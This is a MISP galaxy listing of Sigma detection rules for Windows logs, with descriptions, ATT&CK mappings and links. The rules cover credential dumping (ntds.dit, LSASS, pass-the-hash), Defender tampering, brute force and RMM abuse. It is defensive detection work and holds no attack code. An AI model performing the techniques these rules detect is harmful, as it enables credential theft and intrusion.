Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep

The tag is: misp-galaxy:sigma-rules="Scanner PoC for CVE-2019-0708 RDP RCE Vuln"

Scanner PoC for CVE-2019-0708 RDP RCE Vuln has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"

Table 9102. Table References

Links

https://twitter.com/AdamTheAnalyst/status/1134394070045003776

https://github.com/zerosum0x0/CVE-2019-0708

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_rdp_bluekeep_poc_scanner.yml

External Remote RDP Logon from Public IP

Detects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port.

The tag is: misp-galaxy:sigma-rules="External Remote RDP Logon from Public IP"

External Remote RDP Logon from Public IP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 9103. Table References

Links

https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html

https://twitter.com/Purp1eW0lf/status/1616144561965002752

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_successful_external_remote_rdp_login.yml

Successful Overpass the Hash Attempt

Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz’s sekurlsa::pth module.

The tag is: misp-galaxy:sigma-rules="Successful Overpass the Hash Attempt"

Successful Overpass the Hash Attempt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"

Table 9104. Table References

Links

https://web.archive.org/web/20220419045003/https://cyberwardog.blogspot.com/2017/04/chronicles-of-threat-hunter-hunting-for.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_overpass_the_hash.yml

A Member Was Added to a Security-Enabled Global Group

Detects activity when a member is added to a security-enabled global group

The tag is: misp-galaxy:sigma-rules="A Member Was Added to a Security-Enabled Global Group"

A Member Was Added to a Security-Enabled Global Group has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

Table 9105. Table References

Links

https://www.cisecurity.org/controls/cis-controls-list/

https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf

https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728

https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=632

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_member_added_security_enabled_global_group.yml

Admin User Remote Logon

Detect remote login by Administrator user (depending on internal pattern).

The tag is: misp-galaxy:sigma-rules="Admin User Remote Logon"

Admin User Remote Logon has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Default Accounts - T1078.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003" with estimative-language:likelihood-probability="almost-certain"

Table 9106. Table References

Links

https://car.mitre.org/wiki/CAR-2016-04-005

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_admin_rdp_login.yml

Certificate Exported From Local Certificate Store

Detects when an application exports a certificate (and potentially the private key as well) from the local Windows certificate store.

The tag is: misp-galaxy:sigma-rules="Certificate Exported From Local Certificate Store"

Certificate Exported From Local Certificate Store has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Steal or Forge Authentication Certificates - T1649" with estimative-language:likelihood-probability="almost-certain"

Table 9107. Table References

Links

https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/certificate_services_client_lifecycle_system/win_certificateservicesclient_lifecycle_system_cert_exported.yml

NTLM Brute Force

Detects common NTLM brute force device names

The tag is: misp-galaxy:sigma-rules="NTLM Brute Force"

NTLM Brute Force has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 9108. Table References

Links

https://www.varonis.com/blog/investigate-ntlm-brute-force

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_brute_force.yml

NTLM Logon

Detects logons using NTLM, which could be caused by a legacy source or attackers

The tag is: misp-galaxy:sigma-rules="NTLM Logon"

NTLM Logon has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1550.002" with estimative-language:likelihood-probability="almost-certain"

Table 9109. Table References

Links

https://twitter.com/JohnLaTwC/status/1004895028995477505

https://goo.gl/PsqrhT

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml

Potential Remote Desktop Connection to Non-Domain Host

Detects logons using NTLM to hosts that are potentially not part of the domain.

The tag is: misp-galaxy:sigma-rules="Potential Remote Desktop Connection to Non-Domain Host"

Potential Remote Desktop Connection to Non-Domain Host has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 9110. Table References

Links

n/a[n/a]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_rdp.yml

Ntdsutil Abuse

Detects potential abuse of ntdsutil to dump ntds.dit database

The tag is: misp-galaxy:sigma-rules="Ntdsutil Abuse"

Ntdsutil Abuse has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 9112. Table References

Links

https://twitter.com/mgreen27/status/1558223256704122882

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/jj574207(v=ws.11)

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/esent/win_esent_ntdsutil_abuse.yml

Audit CVE Event

Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability. Unfortunately, that is about the only instance of CVEs being written to this log.

The tag is: misp-galaxy:sigma-rules="Audit CVE Event"

Audit CVE Event has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Defense Evasion - T1211" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Credential Access - T1212" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Application or System Exploitation - T1499.004" with estimative-language:likelihood-probability="almost-certain"

Table 9113. Table References

Links

https://nullsec.us/windows-event-log-audit-cve/

https://twitter.com/FlemmingRiis/status/1217147415482060800

https://twitter.com/VM_vivisector/status/1217190929330655232

https://www.youtube.com/watch?v=ebmW42YYveI

https://twitter.com/DidierStevens/status/1217533958096924676

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml

Backup Catalog Deleted

Detects backup catalog deletions

The tag is: misp-galaxy:sigma-rules="Backup Catalog Deleted"

Backup Catalog Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 9114. Table References

Links

https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100

https://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/microsoft_windows_backup/win_susp_backup_delete.yml

Microsoft Malware Protection Engine Crash - WER

This rule detects a suspicious crash of the Microsoft Malware Protection Engine

The tag is: misp-galaxy:sigma-rules="Microsoft Malware Protection Engine Crash - WER"

Microsoft Malware Protection Engine Crash - WER has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Defense Evasion - T1211" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9115. Table References

Links

https://technet.microsoft.com/en-us/library/security/4022344

https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/windows_error_reporting/win_application_msmpeng_crash_wer.yml

Microsoft Malware Protection Engine Crash

This rule detects a suspicious crash of the Microsoft Malware Protection Engine

The tag is: misp-galaxy:sigma-rules="Microsoft Malware Protection Engine Crash"

Microsoft Malware Protection Engine Crash has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Defense Evasion - T1211" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9116. Table References

Links

https://technet.microsoft.com/en-us/library/security/4022344

https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/application_error/win_application_msmpeng_crash_error.yml

Potential Credential Dumping Via WER - Application

Detects Windows error reporting event where the process that crashed is lsass. This could be the cause of an intentional crash by techniques such as Lsass-Shtinkering to dump credential

The tag is: misp-galaxy:sigma-rules="Potential Credential Dumping Via WER - Application"

Potential Credential Dumping Via WER - Application has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9117. Table References

Links

https://github.com/deepinstinct/Lsass-Shtinkering

https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55

https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/application_error/win_werfault_susp_lsass_credential_dump.yml

Restricted Software Access By SRP

Detects restricted access to applications by the Software Restriction Policies (SRP) policy

The tag is: misp-galaxy:sigma-rules="Restricted Software Access By SRP"

Restricted Software Access By SRP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"

Table 9118. Table References

Links

https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWEventsList/CSV/Windows11/22H2/W11_22H2_Pro_20220920_22621.382/Providers/Microsoft-Windows-AppXDeployment-Server.csv

https://learn.microsoft.com/en-us/windows-server/identity/software-restriction-policies/software-restriction-policies

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/microsoft_windows_software_restriction_policies/win_software_restriction_policies_block.yml

Relevant Anti-Virus Signature Keywords In Application Log

Detects potentially highly relevant antivirus events in the application log based on known virus signature names and malware keywords.

The tag is: misp-galaxy:sigma-rules="Relevant Anti-Virus Signature Keywords In Application Log"

Relevant Anti-Virus Signature Keywords In Application Log has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obtain Capabilities - T1588" with estimative-language:likelihood-probability="almost-certain"

Table 9119. Table References

Links

https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01

https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31

https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/Other/win_av_relevant_match.yml

Remote Access Tool - ScreenConnect File Transfer

Detects file being transferred via ScreenConnect RMM

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - ScreenConnect File Transfer"

Remote Access Tool - ScreenConnect File Transfer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 9120. Table References

Links

https://github.com/SigmaHQ/sigma/pull/4467

https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_file_transfer.yml

Remote Access Tool - ScreenConnect Command Execution

Detects command execution via ScreenConnect RMM

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - ScreenConnect Command Execution"

Remote Access Tool - ScreenConnect Command Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 9121. Table References

Links

https://github.com/SigmaHQ/sigma/pull/4467

https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/screenconnect/win_app_remote_access_tools_screenconnect_command_exec.yml

Atera Agent Installation

Detects successful installation of Atera Remote Monitoring & Management (RMM) agent as recently found to be used by Conti operators

The tag is: misp-galaxy:sigma-rules="Atera Agent Installation"

Atera Agent Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 9122. Table References

Links

https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/msiinstaller/win_software_atera_rmm_agent_install.yml

MSI Installation From Web

Detects installation of a remote msi file from web.

The tag is: misp-galaxy:sigma-rules="MSI Installation From Web"

MSI Installation From Web has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"

Table 9124. Table References

Links

https://twitter.com/st0pp3r/status/1583922009842802689

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/msiinstaller/win_msi_install_from_web.yml

Application Uninstalled

An application has been removed. Check if it is critical.

The tag is: misp-galaxy:sigma-rules="Application Uninstalled"

Application Uninstalled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

Table 9125. Table References

Links

https://learn.microsoft.com/en-us/windows/win32/msi/event-logging

https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/Microsoft-Windows-MsiServer.xml

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/msiinstaller/win_builtin_remove_application.yml

MSSQL Server Failed Logon

Detects failed logon attempts from clients to MSSQL server.

The tag is: misp-galaxy:sigma-rules="MSSQL Server Failed Logon"

MSSQL Server Failed Logon has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 9126. Table References

Links

https://www.experts-exchange.com/questions/27800944/EventID-18456-Failed-to-open-the-explicitly-specified-database.html

https://cybersecthreat.com/2020/07/08/enable-mssql-authentication-log-to-eventlog/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_failed_logon.yml

MSSQL SPProcoption Set

Detects when the a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started

The tag is: misp-galaxy:sigma-rules="MSSQL SPProcoption Set"

Table 9127. Table References

Links

https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-procoption-transact-sql?view=sql-server-ver16

https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_sp_procoption_set.yml

MSSQL Server Failed Logon From External Network

Detects failed logon attempts from clients with external network IP to an MSSQL server. This can be a sign of a bruteforce attack.

The tag is: misp-galaxy:sigma-rules="MSSQL Server Failed Logon From External Network"

MSSQL Server Failed Logon From External Network has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 9129. Table References

Links

https://www.experts-exchange.com/questions/27800944/EventID-18456-Failed-to-open-the-explicitly-specified-database.html

https://cybersecthreat.com/2020/07/08/enable-mssql-authentication-log-to-eventlog/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_failed_logon_from_external_network.yml

MSSQL Add Account To Sysadmin Role

Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role

The tag is: misp-galaxy:sigma-rules="MSSQL Add Account To Sysadmin Role"

Table 9131. Table References

Links

https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/mssqlserver/win_mssql_add_sysadmin_account.yml

Scheduled Task Executed Uncommon LOLBIN

Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or where it is an unusual program to be run from a Scheduled Task

The tag is: misp-galaxy:sigma-rules="Scheduled Task Executed Uncommon LOLBIN"

Scheduled Task Executed Uncommon LOLBIN has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 9133. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_taskscheduler_lolbin_execution_via_task_scheduler.yml

Scheduled Task Executed From A Suspicious Location

Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it’s an unusale program to be run from a Scheduled Task

The tag is: misp-galaxy:sigma-rules="Scheduled Task Executed From A Suspicious Location"

Scheduled Task Executed From A Suspicious Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 9134. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_taskscheduler_execution_from_susp_locations.yml

Important Scheduled Task Deleted

Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities

The tag is: misp-galaxy:sigma-rules="Important Scheduled Task Deleted"

Important Scheduled Task Deleted has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

Table 9135. Table References

Links

https://www.socinvestigation.com/most-common-windows-event-ids-to-hunt-mind-map/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/taskscheduler/win_taskscheduler_susp_schtasks_delete.yml

USB Device Plugged

Detects plugged/unplugged USB devices

The tag is: misp-galaxy:sigma-rules="USB Device Plugged"

USB Device Plugged has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hardware Additions - T1200" with estimative-language:likelihood-probability="almost-certain"

Table 9136. Table References

Links

https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/

https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml

Loading Diagcab Package From Remote Path

Detects loading of diagcab packages from a remote path, as seen in DogWalk vulnerability

The tag is: misp-galaxy:sigma-rules="Loading Diagcab Package From Remote Path"

Table 9137. Table References

Links

https://twitter.com/nas_bench/status/1539679555908141061

https://twitter.com/j00sean/status/1537750439701225472

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml

CodeIntegrity - Blocked Image/Driver Load For Policy Violation

Detects blocked load events that did not meet the authenticode signing level requirements or violated the code integrity policy.

The tag is: misp-galaxy:sigma-rules="CodeIntegrity - Blocked Image/Driver Load For Policy Violation"

CodeIntegrity - Blocked Image/Driver Load For Policy Violation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543" with estimative-language:likelihood-probability="almost-certain"

Table 9145. Table References

Links

https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log

https://twitter.com/wdormann/status/1590434950335320065

https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_enforced_policy_block.yml

CodeIntegrity - Blocked Driver Load With Revoked Certificate

Detects blocked load attempts of revoked drivers

The tag is: misp-galaxy:sigma-rules="CodeIntegrity - Blocked Driver Load With Revoked Certificate"

CodeIntegrity - Blocked Driver Load With Revoked Certificate has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Create or Modify System Process - T1543" with estimative-language:likelihood-probability="almost-certain"

Table 9146. Table References

Links

https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-tag-explanations

Internal Research[Internal Research]

https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/event-id-explanations

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver_blocked.yml

Suspicious Rejected SMB Guest Logon From IP

Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service

The tag is: misp-galaxy:sigma-rules="Suspicious Rejected SMB Guest Logon From IP"

Suspicious Rejected SMB Guest Logon From IP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="almost-certain"

Table 9148. Table References

Links

https://github.com/hhlxf/PrintNightmare

https://github.com/afwu/PrintNightmare

https://twitter.com/KevTheHermit/status/1410203844064301056

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/security/win_smbclient_security_susp_failed_guest_logon.yml

Suspicious Application Installed

Detects suspicious application installed by looking at the added shortcut to the app resolver cache

The tag is: misp-galaxy:sigma-rules="Suspicious Application Installed"

Table 9149. Table References

Links

https://nasbench.medium.com/finding-forensic-goodness-in-obscure-windows-event-logs-60e978ea45a3

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/shell_core/win_shell_core_susp_packages_installed.yml

Sysinternals Tools AppX Versions Execution

Detects execution of Sysinternals tools via an AppX package. Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths

The tag is: misp-galaxy:sigma-rules="Sysinternals Tools AppX Versions Execution"

Table 9152. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml

Microsoft Defender Tamper Protection Trigger

Detects blocked attempts to change any of Defender’s settings such as "Real Time Monitoring" and "Behavior Monitoring"

The tag is: misp-galaxy:sigma-rules="Microsoft Defender Tamper Protection Trigger"

Microsoft Defender Tamper Protection Trigger has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9153. Table References

Links

https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide

https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_tamper_protection_trigger.yml

Windows Defender AMSI Trigger Detected

Detects triggering of AMSI by Windows Defender.

The tag is: misp-galaxy:sigma-rules="Windows Defender AMSI Trigger Detected"

Windows Defender AMSI Trigger Detected has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 9154. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_malware_detected_amsi_source.yml

Windows Defender Real-time Protection Disabled

Detects disabling of Windows Defender Real-time Protection. As this event doesn’t contain a lot of information on who initaited this action you might want to reduce it to a "medium" level if this occurs too many times in your environment

The tag is: misp-galaxy:sigma-rules="Windows Defender Real-time Protection Disabled"

Windows Defender Real-time Protection Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9155. Table References

Links

https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/

https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5001

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_real_time_protection_disabled.yml

Windows Defender Malware And PUA Scanning Disabled

Detects disabling of the Windows Defender feature of scanning for malware and other potentially unwanted software

The tag is: misp-galaxy:sigma-rules="Windows Defender Malware And PUA Scanning Disabled"

Windows Defender Malware And PUA Scanning Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9156. Table References

Links

https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/

https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5010

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_malware_and_pua_scan_disabled.yml

Windows Defender Virus Scanning Feature Disabled

Detects disabling of the Windows Defender virus scanning feature

The tag is: misp-galaxy:sigma-rules="Windows Defender Virus Scanning Feature Disabled"

Windows Defender Virus Scanning Feature Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9157. Table References

Links

https://craigclouditpro.wordpress.com/2020/03/04/hunting-malicious-windows-defender-activity/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide#event-id-5012

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_virus_scan_disabled.yml

Windows Defender Exclusions Added

Detects the Setting of Windows Defender Exclusions

The tag is: misp-galaxy:sigma-rules="Windows Defender Exclusions Added"

Windows Defender Exclusions Added has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9158. Table References

Links

https://twitter.com/_nullbind/status/1204923340810543109

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_config_change_exclusion_added.yml

LSASS Access Detected via Attack Surface Reduction

Detects Access to LSASS Process

The tag is: misp-galaxy:sigma-rules="LSASS Access Detected via Attack Surface Reduction"

LSASS Access Detected via Attack Surface Reduction has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9159. Table References

Links

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/attack-surface-reduction-exploit-guard?WT.mc_id=twitter

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_asr_lsass_access.yml

Windows Defender Real-Time Protection Failure/Restart

Detects issues with Windows Defender Real-Time Protection features

The tag is: misp-galaxy:sigma-rules="Windows Defender Real-Time Protection Failure/Restart"

Windows Defender Real-Time Protection Failure/Restart has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9160. Table References

Links

https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/

Internal Research[Internal Research]

https://gist.github.com/nasbench/33732d6705cbdc712fae356f07666346

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_real_time_protection_errors.yml

Windows Defender Grace Period Expired

Detects the expiration of the grace period of Windows Defender. This means protection against viruses, spyware, and other potentially unwanted software is disabled.

The tag is: misp-galaxy:sigma-rules="Windows Defender Grace Period Expired"

Windows Defender Grace Period Expired has relationships with:

